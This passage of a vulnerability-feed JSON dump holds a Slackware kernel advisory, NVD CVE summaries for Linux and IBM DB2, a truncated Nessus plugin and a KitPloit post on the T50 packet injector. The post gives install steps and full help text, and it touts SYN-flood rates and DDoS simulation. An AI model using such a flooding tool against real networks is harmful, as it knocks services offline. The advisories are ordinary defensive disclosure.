14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-firmware-20180913_44d4fca-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-generic-4.4.157-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-generic-smp-4.4.157_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-headers-4.4.157_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-huge-4.4.157-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-huge-smp-4.4.157_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-modules-4.4.157-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-modules-smp-4.4.157_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.157/kernel-source-4.4.157_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.157/kernel-firmware-20180913_44d4fca-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.157/kernel-generic-4.4.157-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.157/kernel-headers-4.4.157-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.157/kernel-huge-4.4.157-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.157/kernel-modules-4.4.157-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.157/kernel-source-4.4.157-noarch-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 packages:\n4cbc3917d30e3ec997f23aadfbb20d2f kernel-firmware-20180913_44d4fca-noarch-1.txz\ndf3e3e6e806a744b5c2a85ca9a581666 kernel-generic-4.4.157-i586-1.txz\n4786d7445be8ff55f83be49ac7762703 kernel-generic-smp-4.4.157_smp-i686-1.txz\nc1a300d12e24e2321e0b9b30cddbdf5f kernel-headers-4.4.157_smp-x86-1.txz\nb19ce77fa8dd71de87f79237619610bf kernel-huge-4.4.157-i586-1.txz\n0e3bfc4ca162f7e804f9503355d85bec kernel-huge-smp-4.4.157_smp-i686-1.txz\n8bf4a2236dae7c3c4bdbac5df2e4818e kernel-modules-4.4.157-i586-1.txz\nedaaa0d85fba3e7181f94ab8c3f21dfb kernel-modules-smp-4.4.157_smp-i686-1.txz\n0f67c5ebc78917d5e94bf07bcdefb8b6 kernel-source-4.4.157_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n4cbc3917d30e3ec997f23aadfbb20d2f kernel-firmware-20180913_44d4fca-noarch-1.txz\n4e50bbe9a3b7232aeb0679eda5325f87 kernel-generic-4.4.157-x86_64-1.txz\nef8d303cfa4855d39a28f94181752936 kernel-headers-4.4.157-x86-1.txz\n9f531d40bd2151bc0276f8cb5342c38c kernel-huge-4.4.157-x86_64-1.txz\n9911b7530358ba7877eacc8bf1c7d215 kernel-modules-4.4.157-x86_64-1.txz\n91cfbd23a457cdf43ddcfd6b4ae567a5 kernel-source-4.4.157-noarch-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nIf you are using an initrd, you'll need to rebuild it.\n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.157-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.157 | bash\n\nPlease note that "uniprocessor" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run "uname -a". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.157-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.157 as the version.\n\nIf you are using lilo or elilo to boot the machine, you'll need to ensure\nthat the machine is properly prepared before rebooting.\n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou'll need to run "lilo" as root to reinstall the boot loader.\n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition.", "edition": 1, "reporter": "Slackware Linux Project", "published": "2018-09-21T12:47:55", "title": "Slackware 14.2 kernel", "type": "slackware", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-17182"], "modified": "2018-09-21T12:47:55", "id": "SSA-2018-264-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.693090", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-09-22T23:32:00", "references": ["https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=eea2fb4851e9dcbab6b991aaf47e2e024f1f55a0", "https://bugzilla.suse.com/show_bug.cgi?id=1106512"], "description": "An issue was discovered in the Linux kernel through 4.18.6. Incorrect access checking in overlayfs mounts could be used by local attackers to modify or truncate files in the underlying filesystem.", "edition": 1, "reporter": "NVD", "published": "2018-09-21T12:29:01", "title": "CVE-2018-16597", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-16597"], "scanner": [], "modified": "2018-09-21T12:29:01", "cpe": [], "id": "CVE-2018-16597", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16597", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-22T23:32:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/145502", "https://www.ibm.com/support/docview.wss?uid=ibm10729979"], "description": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 contains a vulnerability in db2cacpy that could allow a local user to read any file on the system. IBM X-Force ID: 145502.", "edition": 1, "reporter": "NVD", "published": "2018-09-21T09:29:00", "title": "CVE-2018-1685", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-1685"], "scanner": [], "modified": "2018-09-21T09:29:00", "cpe": [], "id": "CVE-2018-1685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1685", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-22T23:32:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/146369", "https://www.ibm.com/support/docview.wss?uid=ibm10729983"], "description": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local user to to gain privileges due to allowing modificaiton of columns of existing tasks. IBM X-Force ID: 146369.", "edition": 1, "reporter": "NVD", "published": "2018-09-21T09:29:00", "title": "CVE-2018-1711", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-1711"], "scanner": [], "modified": "2018-09-21T09:29:00", "cpe": [], "id": "CVE-2018-1711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1711", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-22T23:32:00", "references": ["https://www.ibm.com/support/docview.wss?uid=ibm10729981", "https://exchange.xforce.ibmcloud.com/vulnerabilities/146364"], "description": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 10.1, 10.5, and 11.1 tool db2licm is affected by buffer overflow vulnerability that can potentially result in arbitrary code execution. IBM X-Force ID: 146364.", "edition": 1, "reporter": "NVD", "published": "2018-09-21T09:29:00", "title": "CVE-2018-1710", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-1710"], "scanner": [], "modified": "2018-09-21T09:29:00", "cpe": [], "id": "CVE-2018-1710", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1710", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2018-09-21T11:01:30", "references": ["https://github.com/fredericopissarra/t50"], "description": "[  ](<https://4.bp.blogspot.com/-o_Hx6Yydl1k/V3nJ2aWOmgI/AAAAAAAAF1E/0LLrkwJlQzgpfvebsNyvMhQLkuIyy2MywCLcB/s1600/t50.png>)\n\n \n\n\nT50 (f.k.a. F22 Raptor) is a tool designed to perform \"Stress Testing\". The concept started on 2001, right after release 'nb-isakmp.c', and the main goal was: \n\n * Having a tool to perform TCP/IP protocol fuzzer, covering common regular protocols, such as: ICMP, TCP and UDP. \n\n \n\n\nThings have changed, and the T50 became a good unique resource capable to perform \"Stress Testing\". And, after checking the \"/usr/include/linux\", some protocols were chosen to be part of its coverage: \n\n 1. ICMP - Internet Control Message Protocol \n 2. IGMP - Internet Group Management Protocol \n 3. TCP - Transmission Control Protocol \n 4. UDP - User Datagram Protocol \n\n \n\n\nWhy \"Stress Testing\"? Well, because when people are designing a new network infra-structure (eg. Datacenter serving to Cloud Computing) they think about: \n\n 1. High-Availability \n 2. Load Balancing \n 3. Backup Sites (Cold Sites, Hot Sites, and Warm Sites) \n 4. Disaster Recovery \n 5. Data Redundancy \n 6. Service Level Agreements \n 7. Etc... \n\n \n\n\nBut almost nobody thinks about \"Stress Testing\", or even performs any test to check how the networks infra-structure behaves under stress, under overload, and under attack. Even during a Penetration Test, people prefer not running any kind of Denial-of-Service testing. Even worse, those people are missing one of the three key concepts of security that are common to risk management: \n\n * Confidentiality \n * Integrity \n * AVAILABILITY \n\n \n\n\nT50 was designed to perform \u201cStress Testing\u201d on a variety of infra-structure network devices (Version 2.45), using widely implemented protocols, and after some requests it was was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP, TCP and UDP), some infra-structure specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP, \n\nEIGRP and OSPF). \n\n \n\n\nThis new version (Version 5.3) is focused on internal infra-structure, which allows people to test the availability of its resources, and cobering: \n\n 1. Interior Gateway Protocols (Distance Vector Algorithm): \n 1. Routing Information Protocol (RIP) \n 2. Enhanced Interior Gateway Routing Protocol (EIGRP) \n 2. Interior Gateway Protocols (Link State Algorithm): \n 1. Open Shortest Path First (OSPF) \n 3. Quality-of-Service Protocols: \n 1. Resource ReSerVation Protocol (RSVP). \n 4. Tunneling/Encapsulation Protocols: \n 1. Generic Routing Encapsulation (GRE). \n\n \n\n\nT50 is a powerful and unique packet injector tool, which is capable to: \n\n 1. Send sequentially the following fifteen (15) protocols: \n 1. ICMP - Internet Control Message Protocol \n 2. IGMPv1 - Internet Group Management Protocol v1 \n 3. IGMPv3 - Internet Group Management Protocol v3 \n 4. TCP - Transmission Control Protocol \n 5. EGP - Exterior Gateway Protocol \n 6. UDP - User Datagram Protocol \n 7. RIPv1 - Routing Information Protocol v1 \n 8. RIPv2 - Routing Information Protocol v2 \n 9. DCCP - Datagram Congestion Control Protocol \n 10. RSVP - Resource ReSerVation Protocol \n 11. GRE - Generic Routing Encapsulation \n 12. IPSec - Internet Protocol Security (AH/ESP) \n 13. EIGRP - Enhanced Interior Gateway Routing Protocol \n 14. OSPF - Open Shortest Path First \n 2. It is the only tool capable to encapsulate the protocols (listed above) within Generic Routing Encapsulation (GRE). \n 3. Send an (quite) incredible amount of packets per second, making it a \"second to none\" tool: \n * More than 1,000,000 pps of SYN Flood (+50% of the network uplink) in a 1000BASE-T Network (Gigabit Ethernet). \n * More than 120,000 pps of SYN Flood (+60% of the network uplink) in a 100BASE-TX Network (Fast Ethernet). \n* Perform \"Stress Testing\" on a variety of network infrastructure, network devices and security solutions in place. \n* Simulate \"Distributed Denial-of-Service\" & \"Denial-of-Service\" attacks, validating Firewall rules, Router ACLs, Intrusion Detection System and Intrusion Prevention System policies. \n\n \n\n\nThe main differentiator of the T50 is that it is able to send all protocols, sequentially, using one single SOCKET, besides it is capable to be used to modify network routes, letting IT Security Professionals performing advanced \"Penetration Test\". \n\n \n** Install ** \n\n \n \n sudo apt-get install build-essential\n git clone https://github.com/fredericopissarra/t50\n cd t50\n ./configure\n sudo make install\n\n \n** Usage ** \n\n \n \n $ t50 --help\n T50 Experimental Mixed Packet Injector Tool 5.6.3\n Originally created by Nelson Brito\n Previously maintained by Fernando Merc\u00eas\n Maintained by Frederico Lamberti Pissarra\n \n Usage: t50 host [options]\n Common Options:\n --threshold NUM Threshold of packets to send (default 1000)\n --flood This option supersedes the 'threshold'\n --encapsulated Encapsulated protocol (GRE) (default OFF)\n -B,--bogus-csum Bogus checksum (default OFF)\n --turbo Extend the performance (default OFF)\n -l,--list-protocols List all available protocols\n -v,--version Print version and exit\n -h,--help Display this help and exit\n \n GRE Options:\n --gre-seq-present GRE sequence # present (default OFF)\n --gre-key-present GRE key present (default OFF)\n --gre-sum-present GRE checksum present (default OFF)\n --gre-key NUM GRE key (default RANDOM)\n --gre-sequence NUM GRE sequence # (default RANDOM)\n --gre-saddr ADDR GRE IP source IP address (default RANDOM)\n --gre-daddr ADDR GRE IP destination IP address (default RANDOM)\n \n DCCP/TCP/UDP Options:\n --sport NUM DCCP|TCP|UDP source port (default RANDOM)\n --dport NUM DCCP|TCP|UDP destination port (default RANDOM)\n \n TCP Options:\n --acknowledge NUM TCP ACK sequence # (default RANDOM)\n --sequence NUM TCP SYN sequence # (default RANDOM)\n --data-offset NUM TCP data offset (default 5)\n -F,--fin TCP FIN flag (default OFF)\n -S,--syn TCP SYN flag (default OFF)\n -R,--rst TCP RST flag (default OFF)\n -P,--psh TCP PSH flag (default OFF)\n -A,--ack TCP ACK flag (default OFF)\n -U,--urg TCP URG flag (default OFF)\n -E,--ece TCP ECE flag (default OFF)\n -C,--cwr TCP CWR flag (default OFF)\n -W,--window NUM TCP Window size (default NONE)\n --urg-pointer NUM TCP URG pointer (default NONE)\n --mss NUM TCP Maximum Segment Size (default NONE)\n --wscale NUM TCP Window Scale (default NONE)\n --tstamp NUM:NUM TCP Timestamp (TSval:TSecr) (default NONE)\n --sack-ok TCP SACK-Permitted (default OFF)\n --ttcp-cc NUM T/TCP Connection Count (CC) (default NONE)\n --ccnew NUM T/TCP Connection Count (CC.NEW) (default NONE)\n --ccecho NUM T/TCP Connection Count (CC.ECHO) (default NONE)\n --sack NUM:NUM TCP SACK Edges (Left:Right) (default NONE)\n --md5-signature TCP MD5 signature included (default OFF)\n --authentication TCP-AO authentication included (default OFF)\n --auth-key-id NUM TCP-AO authentication key ID (default 1)\n --auth-next-key NUM TCP-AO authentication next key (default 1)\n --nop TCP No-Operation (default EOL)\n \n IP Options:\n -s,--saddr ADDR IP source IP address (default RANDOM)\n --tos NUM IP type of service (default 0x40)\n --id NUM IP identification (default RANDOM)\n --frag-offset NUM IP fragmentation offset (default 0)\n --ttl NUM IP time to live (default 255)\n --protocol PROTO IP protocol (default TCP)\n \n ICMP Options:\n --icmp-type NUM ICMP type (default 8)\n --icmp-code NUM ICMP code (default 0)\n --icmp-gateway ADDR ICMP redirect gateway (default RANDOM)\n --icmp-id NUM ICMP identification (default RANDOM)\n --icmp-sequence NUM ICMP sequence # (default RANDOM)\n \n EGP Options:\n --egp-type NUM EGP type (default 3)\n --egp-code NUM EGP code (default 3)\n --egp-status NUM EGP status (default 1)\n --egp-as NUM EGP autonomous system (default RANDOM)\n --egp-sequence NUM EGP sequence # (default RANDOM)\n --egp-hello NUM EGP hello interval (default RANDOM)\n --egp-poll NUM EGP poll interval (default RANDOM)\n \n RIP Options:\n --rip-command NUM RIPv1/v2 command (default 2)\n --rip-family NUM RIPv1/v2 address family (default 2)\n --rip-address ADDR RIPv1/v2 router address (default RANDOM)\n --rip-metric NUM RIPv1/v2 router metric (default RANDOM)\n --rip-domain NUM RIPv2 router domain (default RANDOM)\n --rip-tag NUM RIPv2 router tag (default RANDOM)\n --rip-netmask ADDR RIPv2 router subnet mask (default RANDOM)\n --rip-next-hop ADDR RIPv2 router next hop (default RANDOM)\n --rip-authentication RIPv2 authentication included (default OFF)\n --rip-auth-key-id NUM RIPv2 authentication key ID (default 1)\n --rip-auth-sequence NUM RIPv2 authentication sequence # (default RANDOM)\n \n DCCP Options:\n --dccp-data-offset NUM DCCP data offset (default VARY)\n --dccp-cscov NUM DCCP checksum coverage (default 0)\n --dccp-ccval NUM DCCP HC-Sender CCID (default RANDOM)\n --dccp-type NUM DCCP type (default 0)\n --dccp-extended DCCP extend for sequence # (default OFF)\n --dccp-sequence-1 NUM DCCP sequence # (default RANDOM)\n --dccp-sequence-2 NUM DCCP extended sequence # (default RANDOM)\n --dccp-sequence-3 NUM DCCP sequence # low (default RANDOM)\n --dccp-service NUM DCCP service code (default RANDOM)\n --dccp-acknowledge-1 NUM DCCP acknowledgment # high (default RANDOM)\n --dccp-acknowledge-2 NUM DCCP acknowledgment # low (default RANDOM)\n --dccp-reset-code NUM DCCP reset code (default RANDOM)\n \n RSVP Options:\n --rsvp-flags NUM RSVP flags (default 1)\n --rsvp-type NUM RSVP message type (default 1)\n --rsvp-ttl NUM RSVP time to live (default 254)\n --rsvp-session-addr ADDR RSVP SESSION destination address (default RANDOM)\n --rsvp-session-proto NUM RSVP SESSION protocol ID (default 1)\n --rsvp-session-flags NUM RSVP SESSION flags (default 1)\n --rsvp-session-port NUM RSVP SESSION destination port (default RANDOM)\n --rsvp-hop-addr ADDR RSVP HOP neighbor address (default RANDOM)\n --rsvp-hop-iface NUM RSVP HOP logical interface (default RANDOM)\n --rsvp-time-refresh NUM RSVP TIME refresh interval (default 360)\n --rsvp-error-addr ADDR RSVP ERROR node address (default RANDOM)\n --rsvp-error-flags NUM RSVP ERROR flags (default 2)\n --rsvp-error-code NUM RSVP ERROR code (default 2)\n --rsvp-error-value NUM RSVP ERROR value (default 8)\n --rsvp-scope NUM RSVP SCOPE # of address(es) (default 1)\n --rsvp-address ADDR,... RSVP SCOPE address(es) (default RANDOM)\n --rsvp-style-option NUM RSVP STYLE option vector (default 18)\n --rsvp-sender-addr ADDR RSVP SENDER TEMPLATE address (default RANDOM)\n --rsvp-sender-port NUM RSVP SENDER TEMPLATE port (default RANDOM)\n --rsvp-tspec-traffic RSVP TSPEC service traffic (default OFF)\n --rsvp-tspec-guaranteed RSVP TSPEC service guaranteed (default OFF)\n --rsvp-tspec-r NUM RSVP TSPEC token bucket rate (default RANDOM)\n --rsvp-tspec-b NUM RSVP TSPEC token bucket size (default RANDOM)\n --rsvp-tspec-p NUM RSVP TSPEC peak data rate (default RANDOM)\n --rsvp-tspec-m NUM RSVP TSPEC minimum policed unit (default RANDOM)\n --rsvp-tspec-M NUM RSVP TSPEC maximum packet size (default RANDOM)\n --rsvp-adspec-ishop NUM RSVP ADSPEC IS HOP count (default RANDOM)\n --rsvp-adspec-path NUM RSVP ADSPEC path b/w estimate (default RANDOM)\n --rsvp-adspec-m NUM RSVP ADSPEC minimum path latency (default RANDOM)\n --rsvp-adspec-mtu NUM RSVP ADSPEC composed MTU (default RANDOM)\n --rsvp-adspec-guaranteed RSVP ADSPEC service guaranteed (default OFF)\n --rsvp-adspec-Ctot NUM RSVP ADSPEC ETE composed value C (default RANDOM)\n --rsvp-adspec-Dtot NUM RSVP ADSPEC ETE composed value D (default RANDOM)\n --rsvp-adspec-Csum NUM RSVP ADSPEC SLR point composed C (default RANDOM)\n --rsvp-adspec-Dsum NUM RSVP ADSPEC SLR point composed D (default RANDOM)\n --rsvp-adspec-controlled RSVP ADSPEC service controlled (default OFF)\n --rsvp-confirm-addr ADDR RSVP CONFIRM receiver address (default RANDOM)\n \n IPSEC Options:\n --ipsec-ah-length NUM IPSec AH header length (default NONE)\n --ipsec-ah-spi NUM IPSec AH SPI (default RANDOM)\n --ipsec-ah-sequence NUM IPSec AH sequence # (default RANDOM)\n --ipsec-esp-spi NUM IPSec ESP SPI (default RANDOM)\n --ipsec-esp-sequence NUM IPSec ESP sequence # (default RANDOM)\n \n EIGRP Options:\n --eigrp-opcode NUM EIGRP opcode (default 1)\n --eigrp-flags NUM EIGRP flags (default RANDOM)\n --eigrp-sequence NUM EIGRP sequence # (default RANDOM)\n --eigrp-acknowledge NUM EIGRP acknowledgment # (default RANDOM)\n --eigrp-as NUM EIGRP autonomous system (default RANDOM)\n --eigrp-type NUM EIGRP type (default 258)\n --eigrp-length NUM EIGRP length (default NONE)\n --eigrp-k1 NUM EIGRP parameter K1 value (default 1)\n --eigrp-k2 NUM EIGRP parameter K2 value (default 0)\n --eigrp-k3 NUM EIGRP parameter K3 value (default 1)\n --eigrp-k4 NUM EIGRP parameter K4 value (default 0)\n --eigrp-k5 NUM EIGRP parameter K5 value (default 0)\n --eigrp-hold NUM EIGRP parameter hold time (default 360)\n --eigrp-ios-ver NUM.NUM EIGRP IOS release version (default 12.4)\n --eigrp-rel-ver NUM.NUM EIGRP PROTO release version (default 1.2)\n --eigrp-next-hop ADDR EIGRP [in|ex]ternal next-hop (default RANDOM)\n --eigrp-delay NUM EIGRP [in|ex]ternal delay (default RANDOM)\n --eigrp-bandwidth NUM EIGRP [in|ex]ternal bandwidth (default RANDOM)\n --eigrp-mtu NUM EIGRP [in|ex]ternal MTU (default 1500)\n --eigrp-hop-count NUM EIGRP [in|ex]ternal hop count (default RANDOM)\n --eigrp-load NUM EIGRP [in|ex]ternal load (default RANDOM)\n --eigrp-reliability NUM EIGRP [in|ex]ternal reliability (default RANDOM)\n --eigrp-daddr ADDR/CIDR EIGRP [in|ex]ternal address(es) (default RANDOM)\n --eigrp-src-router ADDR EIGRP external source router (default RANDOM)\n --eigrp-src-as NUM EIGRP external autonomous system (default RANDOM)\n --eigrp-tag NUM EIGRP external arbitrary tag (default RANDOM)\n --eigrp-proto-metric NUM EIGRP external protocol metric (default RANDOM)\n --eigrp-proto-id NUM EIGRP external protocol ID (default 2)\n --eigrp-ext-flags NUM EIGRP external flags (default RANDOM)\n --eigrp-address ADDR EIGRP multicast sequence address (default RANDOM)\n --eigrp-multicast NUM EIGRP multicast sequence # (default RANDOM)\n --eigrp-authentication EIGRP authentication included (default OFF)\n --eigrp-auth-key-id NUM EIGRP authentication key ID (default 1)\n \n OSPF Options:\n --ospf-type NUM OSPF type (default 1)\n --ospf-length NUM OSPF length (default NONE)\n --ospf-router-id ADDR OSPF router ID (default RANDOM)\n --ospf-area-id ADDR OSPF area ID (default 0.0.0.0)\n -1,--ospf-option-MT OSPF multi-topology / TOS-based (default RANDOM)\n -2,--ospf-option-E OSPF external routing capability (default RANDOM)\n -3,--ospf-option-MC OSPF multicast capable (default RANDOM)\n -4,--ospf-option-NP OSPF NSSA supported (default RANDOM)\n -5,--ospf-option-L OSPF LLS data block contained (default RANDOM)\n -6,--ospf-option-DC OSPF demand circuits supported (default RANDOM)\n -7,--ospf-option-O OSPF Opaque-LSA (default RANDOM)\n -8,--ospf-option-DN OSPF DOWN bit (default RANDOM)\n --ospf-netmask ADDR OSPF router subnet mask (default RANDOM)\n --ospf-hello-interval NUM OSPF HELLO interval (default RANDOM)\n --ospf-hello-priority NUM OSPF HELLO router priority (default 1)\n --ospf-hello-dead NUM OSPF HELLO router dead interval (default 360)\n --ospf-hello-design ADDR OSPF HELLO designated router (default RANDOM)\n --ospf-hello-backup ADDR OSPF HELLO backup designated (default RANDOM)\n --ospf-neighbor NUM OSPF HELLO # of neighbor(s) (default NONE)\n --ospf-address ADDR,... OSPF HELLO neighbor address(es) (default RANDOM)\n --ospf-dd-mtu NUM OSPF DD MTU (default 1500)\n --ospf-dd-dbdesc-MS OSPF DD master/slave bit option (default RANDOM)\n --ospf-dd-dbdesc-M OSPF DD more bit option (default RANDOM)\n --ospf-dd-dbdesc-I OSPF DD init bit option (default RANDOM)\n --ospf-dd-dbdesc-R OSPF DD out-of-band resync (default RANDOM)\n --ospf-dd-sequence NUM OSPF DD sequence # (default RANDOM)\n --ospf-dd-include-lsa OSPF DD include LSA header (default OFF)\n --ospf-lsa-age NUM OSPF LSA age (default 360)\n --ospf-lsa-do-not-age OSPF LSA do not age (default OFF)\n --ospf-lsa-type NUM OSPF LSA type (default 1)\n --ospf-lsa-id ADDR OSPF LSA ID address (default RANDOM)\n --ospf-lsa-router ADDR OSPF LSA advertising router (default RANDOM)\n --ospf-lsa-sequence NUM OSPF LSA sequence # (default RANDOM)\n --ospf-lsa-metric NUM OSPF LSA metric (default RANDOM)\n --ospf-lsa-flag-B OSPF Router-LSA border router (default RANDOM)\n --ospf-lsa-flag-E OSPF Router-LSA external router (default RANDOM)\n --ospf-lsa-flag-V OSPF Router-LSA virtual router (default RANDOM)\n --ospf-lsa-flag-W OSPF Router-LSA wild router (default RANDOM)\n --ospf-lsa-flag-NT OSPF Router-LSA NSSA translation (default RANDOM)\n --ospf-lsa-link-id ADDR OSPF Router-LSA link ID (default RANDOM)\n --ospf-lsa-link-data ADDR OSPF Router-LSA link data (default RANDOM)\n --ospf-lsa-link-type NUM OSPF Router-LSA link type (default 1)\n --ospf-lsa-attached ADDR OSPF Network-LSA attached router (default RANDOM)\n --ospf-lsa-larger OSPF ASBR/NSSA-LSA ext. larger (default OFF)\n --ospf-lsa-forward ADDR OSPF ASBR/NSSA-LSA forward (default RANDOM)\n --ospf-lsa-external ADDR OSPF ASBR/NSSA-LSA external (default RANDOM)\n --ospf-vertex-router OSPF Group-LSA type router (default RANDOM)\n --ospf-vertex-network OSPF Group-LSA type network (default RANDOM)\n --ospf-vertex-id ADDR OSPF Group-LSA vertex ID (default RANDOM)\n --ospf-lls-extended-LR OSPF LLS Extended option LR (default OFF)\n --ospf-lls-extended-RS OSPF LLS Extended option RS (default OFF)\n --ospf-authentication OSPF authentication included (default OFF)\n --ospf-auth-key-id NUM OSPF authentication key ID (default 1)\n --ospf-auth-sequence NUM OSPF authentication sequence # (default RANDOM)\n \n Some considerations while running this program:\n 1. There is no limitation of using as many options as possible.\n 2. Report t50 bugs at https://github.com/fredericopissarra/t50.git.\n 3. Some header fields with default values MUST be set to '0' for RANDOM.\n 4. Mandatory arguments to long options are mandatory for short options too.\n 5. Be nice when using t50, the author DENIES its use for DoS/DDoS purposes.\n 6. Running t50 with '--protocol T50' option sends ALL protocols sequentially.\n \n\n \n[ \n](<https://github.com/fredericopissarra/t50>) \n\n\n[ ** Download T50 ** ](<https://github.com/fredericopissarra/t50>)\n", "edition": 2, "reporter": "KitPloit", "published": "2018-09-21T02:20:53", "title": "T50 - The Fastest Packet Injector", "type": "kitploit", "enchantments": {"score": {"modified": "2018-09-21T11:01:30", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-09-21T02:20:53", "toolHref": "https://github.com/fredericopissarra/t50", "id": "KITPLOIT:296108905078973984", "href": "http://www.kitploit.com/2016/07/t50-fastest-packet-injector.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-09-22T18:31:55", "references": ["https://github.com/vmware/photon/wiki/Security-Updates-2-93"], "pluginID": "117634", "description": "An update of 'nodejs' packages of Photon OS has been released.", "edition": 1, "reporter": "Tenable", "published": "2018-09-21T00:00:00", "title": "Photon OS 2.0: Nodejs PHSA-2018-2.0-0093", "type": "nessus", "enchantments": {}, "naslFamily": "PhotonOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7167", "CVE-2018-7161"], "modified": "2018-09-21T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:nodejs"], "id": "PHOTONOS_PHSA-2018-2_0-0093.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117634", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0093. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117634);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/21 12:33:59\");\n\n script_cve_id(\"CVE-2018-7161\", \"CVE-2018-7167\");\n\n script_name(english:\"Photon OS 2.0: Nodejs PHSA-2018-2.0-0093\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'nodejs' packages of Photon OS has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-93\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7161\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/21\");\n\n 